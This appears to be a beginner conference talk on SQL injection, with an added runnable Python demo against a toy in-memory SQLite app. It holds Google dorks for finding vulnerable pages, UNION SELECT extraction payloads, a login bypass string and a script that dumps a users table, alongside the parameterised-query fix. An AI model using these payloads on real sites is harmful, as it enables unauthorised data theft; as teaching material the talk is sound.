Turn on breakfast news and chances are you'll hear about the latest data breach. Another database has been dumped and another million people have had their credit card details stolen. How'd they do it? SQL Injection. SQL Injection is a common vulnerability in the server-side code behind websites and mobile applications. I'll introduce you to it, how it works, how to do it yourself and how to fix it. There will be classic hits, select memes and enough info so that when you get home you can take down your own website and make it rain data.
Check out the full version with hilarious gifs and some sweet tunes here: https://youtu.be/TTkOo9-0wMk
What You're Going to Learn
• Checking for SQL Injection vulnerabilities is quick and you can do it too!
• How to execute a SQL Injection
• How to fix SQL Injection vulnerabilities
Creating a Conversation with the Database
• SQL is how an application talks to its database: it sends queries, otherwise known as questions, and the database answers. SQL Injection is what happens when text a user typed ends up inside one of those questions and changes what is being asked.
• Know Thy Database.
Speaking in Database Tongue
From the table called users, check that the username Jo@influencer4lyfe.com.au is there and that the password stored for Jo, Influencerlyfe2019!, matches the password Jo supplied. (A real application should store and compare a password hash rather than the plaintext, but the shape of the question is the same.)
SQLi Hunting in the Wilds of the Internet
Google Dorks: the format for an advanced search in Google is where-you-want-to-search:keyword, for example
inurl:php?id=
inurl restricts results to pages whose URL contains the keyword, so this one finds PHP pages that take an id parameter in the URL, the classic place to test for injection.
5. Get the Database Version
+union select 1,version(),3
In the URL the + stands for a space. The UNION SELECT has the same number of columns as the page's own query (counted in step 3), and version() sits in the column the page echoes back (found in step 4); 1 and 3 are just fillers.

6. Get the Database Name
+union select database(),2,3
The function goes in whichever column the page echoes; here that is the first one.

7. Get all the other tables to talk to them too
'UNION SELECT 1, group_concat(table_name) from information_schema.tables where table_schema=database()%23
This returns every table in the current database in a single cell (group_concat joins the names with commas). The leading quote closes the string the parameter was sitting in, and %23 is a URL-encoded #, which in MySQL comments out the rest of the original query. Note that it lists tables, not other databases: the names of the other databases on the server are in information_schema.schemata.
7 Steps to SQLi Heaven
1. Get the database to tell you the language it speaks
2. Get the contents of the database you're currently talking to
3. Count the columns to speak to other tables in the database
4. Check for the vulnerable column
5. Get the database version
6. Get the database name
7. Get all the other tables to talk to them too
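The login question from the "Speaking in Database Tongue" slide and the seven steps, worked through as an added example that is not part of the talk. It is Python against an in-memory SQLite database so it runs offline; the tables, the product page, the fictional accounts and the helper names (login_vulnerable, login_fixed, product_page_vulnerable, run_seven_steps) are all assumptions made here. The deck's payloads are MySQL: version() and information_schema become sqlite_version() and sqlite_master in SQLite, and step 6 (database()) has no SQLite equivalent, so it is skipped. The NULL-counting in step 3 and the marker trick in step 4 generalise what the slides show for steps 5 to 7.

```python
# Added example, not from the talk: a toy vulnerable app over in-memory SQLite.
# Shows the login question, the classic bypass, the parameterised fix, and the
# "7 Steps to SQLi Heaven" UNION walk-through. SQLite stand-ins for the MySQL
# payloads: sqlite_version() for version(), sqlite_master for
# information_schema.tables. All names and data below are made up.
import sqlite3

def make_db():
    """Constructed sample data: one users table and one products table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES
            ('Jo@influencer4lyfe.com.au', 'Influencerlyfe2019!'),
            ('admin', 'correct-horse-battery-staple');
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT);
        INSERT INTO products (name, price) VALUES ('hammer', '20'), ('nails', '5');
    """)
    return conn

# --- "Speaking in Database Tongue": the login question -----------------------
def login_vulnerable(conn, username, password):
    """String concatenation: whatever the user types becomes part of the SQL."""
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_fixed(conn, username, password):
    """Parameterised query: input is bound as data and cannot change the question."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# --- "7 Steps to SQLi Heaven" against a product page, ?id=<number> ------------
def product_page_vulnerable(conn, id_param):
    """Models GET /product?id=...; the page renders only the product name."""
    sql = "SELECT id, name, price FROM products WHERE id = " + id_param
    return [row[1] for row in conn.execute(sql).fetchall()]

def probe_error(page):
    """Step 1: a stray quote makes the database complain in its own dialect."""
    try:
        page("1'")
        return None
    except sqlite3.OperationalError as err:
        return str(err)

def count_columns(page, max_cols=10):
    """Step 3: UNION SELECT with 1, 2, 3, ... NULLs until the count matches."""
    for n in range(1, max_cols + 1):
        try:
            page("-1 UNION SELECT " + ", ".join(["NULL"] * n))
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("column count not found")

def find_visible_column(page, ncols):
    """Step 4: put a distinct marker in every column; the one echoed back is
    the column you can read data through."""
    markers = ["'col%d'" % i for i in range(1, ncols + 1)]
    shown = page("-1 UNION SELECT " + ", ".join(markers))
    for i, marker in enumerate(markers, start=1):
        if marker.strip("'") in shown:
            return i
    raise RuntimeError("no column is rendered")

def extract(page, ncols, col, expr, from_clause=""):
    """Steps 2, 5, 7: read one expression through the visible column.
    id = -1 matches no real product, so the only row rendered is ours."""
    cells = ["NULL"] * ncols
    cells[col - 1] = expr
    return page("-1 UNION SELECT " + ", ".join(cells) + " " + from_clause)[0]

def run_seven_steps(conn):
    """Runs the walk-through and returns what each step learned."""
    page = lambda p: product_page_vulnerable(conn, p)
    ncols = count_columns(page)
    col = find_visible_column(page, ncols)
    return {
        "error": probe_error(page),                                    # step 1
        "columns": ncols,                                              # step 3
        "visible_column": col,                                         # step 4
        "version": extract(page, ncols, col, "sqlite_version()"),      # step 5
        # step 6 (database()) has no SQLite equivalent
        "tables": extract(page, ncols, col, "group_concat(name)",
                          "FROM sqlite_master WHERE type = 'table'"),  # step 7
        "users": extract(page, ncols, col,
                         "group_concat(username || ':' || password)",
                         "FROM users"),                                # step 2
    }

if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1"
    print("vulnerable login bypassed:", login_vulnerable(db, bypass, bypass))
    print("fixed login bypassed:     ", login_fixed(db, bypass, bypass))
    for step, value in run_seven_steps(db).items():
        print(step, "->", value)
```

Run it directly to see both logins and each step's result. The parameterised query in login_fixed is the fix the talk promises: the database compiles the question before it ever sees Jo's input, so the input can only ever be data, never part of the question.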
Thank you for listening! That was:
It's Hammertime: SQL Injection For Beginners
#CyberCon #W0m3nWh0HackM3lb0urn3 @Deloitte
I am Dr. Brigitte Lewis | @briglewis